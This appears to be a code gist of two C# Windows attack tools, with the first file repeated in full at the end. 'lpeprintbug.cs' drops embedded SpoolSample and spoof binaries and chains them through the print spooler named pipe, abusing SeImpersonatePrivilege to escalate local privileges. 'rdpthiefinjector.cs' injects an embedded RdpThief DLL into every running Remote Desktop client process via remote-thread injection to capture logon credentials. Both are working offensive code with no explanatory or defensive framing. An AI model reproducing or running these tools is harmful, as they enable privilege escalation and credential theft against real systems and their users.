tahadraidia/lpeprintbug.cs

## lpeprintbug.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Collections.Generic;
using System.Text.RegularExpressions;

namespace LPEPrintBug
{
    public static class Program
    {
        public static uint TOKEN_QUERY = 0x00000008;

        [StructLayout(LayoutKind.Sequential)]
        public struct LUID_AND_ATTRIBUTES
        {
            public LUID Luid;
            public UInt32 Attributes;

            public const UInt32 SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001;
            public const UInt32 SE_PRIVILEGE_ENABLED = 0x00000002;
            public const UInt32 SE_PRIVILEGE_REMOVED = 0x00000004;
            public const UInt32 SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000;
        }

        [StructLayout(LayoutKind.Sequential)]
        public struct LUID
        {
            public UInt32 LowPart;
            public Int32 HighPart;
        }

        [StructLayout(LayoutKind.Sequential)]
        public struct PRIVILEGE_SET
        {
            public uint PrivilegeCount;
            public uint Control;  // use PRIVILEGE_SET_ALL_NECESSARY

            public static uint PRIVILEGE_SET_ALL_NECESSARY = 1;

            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)]
            public LUID_AND_ATTRIBUTES[] Privilege;
        }

        [DllImport("advapi32.dll")]
        static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid);

        [DllImport("advapi32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr GetCurrentProcess();


        [DllImport("advapi32.dll", SetLastError = true)]
        public static extern bool PrivilegeCheck(
            IntPtr ClientToken,
            ref PRIVILEGE_SET RequiredPrivileges,
            out bool pfResult
            );


        public static bool IsPrivilegeEnabled(string Privilege)
        {
            bool ret;
            LUID luid = new LUID();
            IntPtr hProcess = GetCurrentProcess();
            IntPtr hToken;
            if (hProcess == IntPtr.Zero) return false;
            if (!OpenProcessToken(hProcess, TOKEN_QUERY, out hToken)) return false;
            if (!LookupPrivilegeValue(null, Privilege, out luid)) return false;
            PRIVILEGE_SET privs = new PRIVILEGE_SET { Privilege = new LUID_AND_ATTRIBUTES[1], Control = PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY, PrivilegeCount = 1 };
            privs.Privilege[0].Luid = luid;
            privs.Privilege[0].Attributes = LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;
            if (!PrivilegeCheck(hToken, ref privs, out ret)) return false;
            return ret;
        }

        // Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496
        public static void WriteResourceToFile(string resourceName, string fileName)
        {
            try
            {
            int bufferSize = 4096; // set 4KB buffer
            byte[] buffer = new byte[bufferSize];
            using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
            using (Stream output = new FileStream(fileName, FileMode.Create))
            {
                int byteCount = input.Read(buffer, 0, bufferSize);
                while (byteCount > 0)
                {
                    output.Write(buffer, 0, byteCount);
                    byteCount = input.Read(buffer, 0, bufferSize);
                }
            }
            }catch(Exception e) { Console.WriteLine(e.Message); }
        }
        public static void Main()
        {

            bool isElevated;
            WindowsIdentity identity = WindowsIdentity.GetCurrent();
            WindowsPrincipal principal = new WindowsPrincipal(identity);
            isElevated = principal.IsInRole(WindowsBuiltInRole.Administrator);

            // Already admin bail.
            if (isElevated)
            {
                Console.WriteLine("Already Administrator!");
                System.Environment.Exit(0);
            }


            //  SeImpersonatePrivilege not available.
            if (!IsPrivilegeEnabled("SeImpersonatePrivilege"))
            {
                Console.WriteLine("SeImpersonatePrivilege privilege is required.");
                System.Environment.Exit(0);
            }

            const string spoolsample =  @"C:\Windows\Tasks\SpoolSample.exe";
            const string spoof =  @"C:\Windows\Tasks\spoof.exe";
            const string local =  @"C:\Windows\Tasks\local.exe";
            string hostname = Dns.GetHostName();

            // Check for file on Disk
            var files = new List<String>();
            files.Add(spoolsample);
            files.Add(spoof);
            files.Add(local);
            Regex regx = new Regex("[a-zA-Z0-9]+.exe");
            foreach (string file in files)
            {
                if(!File.Exists(file))
                {
                    MatchCollection matched= regx.Matches(file);
                    if(matched.Count == 1)
                    {
                        WriteResourceToFile(matched[0].Value, file);
                    }
                }
            }


            // Give it time.
            Thread.Sleep(3000);

            // Bail if files does not exists on disk.
            if (!File.Exists(spoof) || !File.Exists(spoolsample))
                System.Environment.Exit(0);

            string spoolsampleparam = String.Format("{0} {0}/pipe/test", hostname);

            Runner runner1 = new Runner(spoof, @"\\.\pipe\test\pipe\spoolss");
            Runner runner2 = new Runner(spoolsample, spoolsampleparam);

            Thread th1 = new Thread(new ThreadStart(runner1.Execute));

            th1.Start();

            if (th1.ThreadState == System.Threading.ThreadState.Running)
                new Thread(new ThreadStart(runner2.Execute)).Start();
        }
    }

    public class Runner
    {
        private string filename = null;
        private string param = null;

        public Runner(string filename, string param)
        {
            this.filename = filename;
            this.param = param;
        }

        public void Execute()
        {
            Process pr = new Process();
            ProcessStartInfo prs = new ProcessStartInfo();
            prs.FileName = filename;
            prs.Arguments = param;
            pr.StartInfo = prs;

            bool ret = pr.Start();
            if(!ret)
            {
                Console.WriteLine("Something went wrong, bail!");
                System.Environment.Exit(0);
            }
        }
    }
}

## rdpthiefinjector.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;

namespace RDPThiefInjector
{
    public class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
        byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);

        // Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496
        public static void WriteResourceToFile(string resourceName, string fileName)
        {
            try
            {
                int bufferSize = 4096; // set 4KB buffer
                byte[] buffer = new byte[bufferSize];
                using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
                using (Stream output = new FileStream(fileName, FileMode.Create))
                {
                    int byteCount = input.Read(buffer, 0, bufferSize);
                    while (byteCount > 0)
                    {
                        output.Write(buffer, 0, byteCount);
                        byteCount = input.Read(buffer, 0, bufferSize);
                    }
                }
            }
            catch (Exception e) { Console.WriteLine(e.Message); }
        }

        public static void Main()
        {
            const String dllName = @"C:\Windows\Tasks\rdp.dll";
            String creds = String.Format("{0}/data.bin",Environment.GetEnvironmentVariable("TMP"));

            WriteResourceToFile("RdpThief.dll", dllName);

            if (!File.Exists(dllName))
                System.Environment.Exit(0);

            Console.WriteLine("Program Strated ...");

            while (true)
            {
                Process[] mstscProc = Process.GetProcessesByName("mstsc");
                if (mstscProc.Length > 0)
                {

                    if (!File.Exists(dllName))
                        System.Environment.Exit(0);

                    for (int i = 0; i < mstscProc.Length; i++)
                    {
                        int pid = mstscProc[i].Id;
                        IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid);
                        IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
                        IntPtr outSize;
                        WriteProcessMemory(hProcess, addr,
                        	Encoding.Default.GetBytes(dllName), dllName.Length, out outSize);
                        IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
                        CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr,
                        	0, IntPtr.Zero);
                    }
                }
                if (File.Exists(creds))
                    Console.WriteLine("Found: " + creds);System.Environment.Exit(0);
                Thread.Sleep(1000);
            }
        }
    }
}
	using System;
	using System.Diagnostics;
	using System.IO;
	using System.Net;
	using System.Runtime.InteropServices;
	using System.Security.Principal;
	using System.Threading;
	using System.Collections.Generic;
	using System.Text.RegularExpressions;

	namespace LPEPrintBug
	{
	public static class Program
	{
	public static uint TOKEN_QUERY = 0x00000008;

	[StructLayout(LayoutKind.Sequential)]
	public struct LUID_AND_ATTRIBUTES
	{
	public LUID Luid;
	public UInt32 Attributes;

	public const UInt32 SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001;
	public const UInt32 SE_PRIVILEGE_ENABLED = 0x00000002;
	public const UInt32 SE_PRIVILEGE_REMOVED = 0x00000004;
	public const UInt32 SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000;
	}

	[StructLayout(LayoutKind.Sequential)]
	public struct LUID
	{
	public UInt32 LowPart;
	public Int32 HighPart;
	}

	[StructLayout(LayoutKind.Sequential)]
	public struct PRIVILEGE_SET
	{
	public uint PrivilegeCount;
	public uint Control; // use PRIVILEGE_SET_ALL_NECESSARY

	public static uint PRIVILEGE_SET_ALL_NECESSARY = 1;

	[MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)]
	public LUID_AND_ATTRIBUTES[] Privilege;
	}

	[DllImport("advapi32.dll")]
	static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid);

	[DllImport("advapi32.dll", SetLastError = true)]
	[return: MarshalAs(UnmanagedType.Bool)]
	static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);

	[DllImport("kernel32.dll", SetLastError = true)]
	static extern IntPtr GetCurrentProcess();


	[DllImport("advapi32.dll", SetLastError = true)]
	public static extern bool PrivilegeCheck(
	IntPtr ClientToken,
	ref PRIVILEGE_SET RequiredPrivileges,
	out bool pfResult
	);


	public static bool IsPrivilegeEnabled(string Privilege)
	{
	bool ret;
	LUID luid = new LUID();
	IntPtr hProcess = GetCurrentProcess();
	IntPtr hToken;
	if (hProcess == IntPtr.Zero) return false;
	if (!OpenProcessToken(hProcess, TOKEN_QUERY, out hToken)) return false;
	if (!LookupPrivilegeValue(null, Privilege, out luid)) return false;
	PRIVILEGE_SET privs = new PRIVILEGE_SET { Privilege = new LUID_AND_ATTRIBUTES[1], Control = PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY, PrivilegeCount = 1 };
	privs.Privilege[0].Luid = luid;
	privs.Privilege[0].Attributes = LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;
	if (!PrivilegeCheck(hToken, ref privs, out ret)) return false;
	return ret;
	}

	// Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496
	public static void WriteResourceToFile(string resourceName, string fileName)
	{
	try
	{
	int bufferSize = 4096; // set 4KB buffer
	byte[] buffer = new byte[bufferSize];
	using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
	using (Stream output = new FileStream(fileName, FileMode.Create))
	{
	int byteCount = input.Read(buffer, 0, bufferSize);
	while (byteCount > 0)
	{
	output.Write(buffer, 0, byteCount);
	byteCount = input.Read(buffer, 0, bufferSize);
	}
	}
	}catch(Exception e) { Console.WriteLine(e.Message); }
	}
	public static void Main()
	{

	bool isElevated;
	WindowsIdentity identity = WindowsIdentity.GetCurrent();
	WindowsPrincipal principal = new WindowsPrincipal(identity);
	isElevated = principal.IsInRole(WindowsBuiltInRole.Administrator);

	// Already admin bail.
	if (isElevated)
	{
	Console.WriteLine("Already Administrator!");
	System.Environment.Exit(0);
	}


	// SeImpersonatePrivilege not available.
	if (!IsPrivilegeEnabled("SeImpersonatePrivilege"))
	{
	Console.WriteLine("SeImpersonatePrivilege privilege is required.");
	System.Environment.Exit(0);
	}

	const string spoolsample = @"C:\Windows\Tasks\SpoolSample.exe";
	const string spoof = @"C:\Windows\Tasks\spoof.exe";
	const string local = @"C:\Windows\Tasks\local.exe";
	string hostname = Dns.GetHostName();

	// Check for file on Disk
	var files = new List<String>();
	files.Add(spoolsample);
	files.Add(spoof);
	files.Add(local);
	Regex regx = new Regex("[a-zA-Z0-9]+.exe");
	foreach (string file in files)
	{
	if(!File.Exists(file))
	{
	MatchCollection matched= regx.Matches(file);
	if(matched.Count == 1)
	{
	WriteResourceToFile(matched[0].Value, file);
	}
	}
	}


	// Give it time.
	Thread.Sleep(3000);

	// Bail if files does not exists on disk.
	if (!File.Exists(spoof) \|\| !File.Exists(spoolsample))
	System.Environment.Exit(0);

	string spoolsampleparam = String.Format("{0} {0}/pipe/test", hostname);

	Runner runner1 = new Runner(spoof, @"\\.\pipe\test\pipe\spoolss");
	Runner runner2 = new Runner(spoolsample, spoolsampleparam);

	Thread th1 = new Thread(new ThreadStart(runner1.Execute));

	th1.Start();

	if (th1.ThreadState == System.Threading.ThreadState.Running)
	new Thread(new ThreadStart(runner2.Execute)).Start();
	}
	}

	public class Runner
	{
	private string filename = null;
	private string param = null;

	public Runner(string filename, string param)
	{
	this.filename = filename;
	this.param = param;
	}

	public void Execute()
	{
	Process pr = new Process();
	ProcessStartInfo prs = new ProcessStartInfo();
	prs.FileName = filename;
	prs.Arguments = param;
	pr.StartInfo = prs;

	bool ret = pr.Start();
	if(!ret)
	{
	Console.WriteLine("Something went wrong, bail!");
	System.Environment.Exit(0);
	}
	}
	}
	}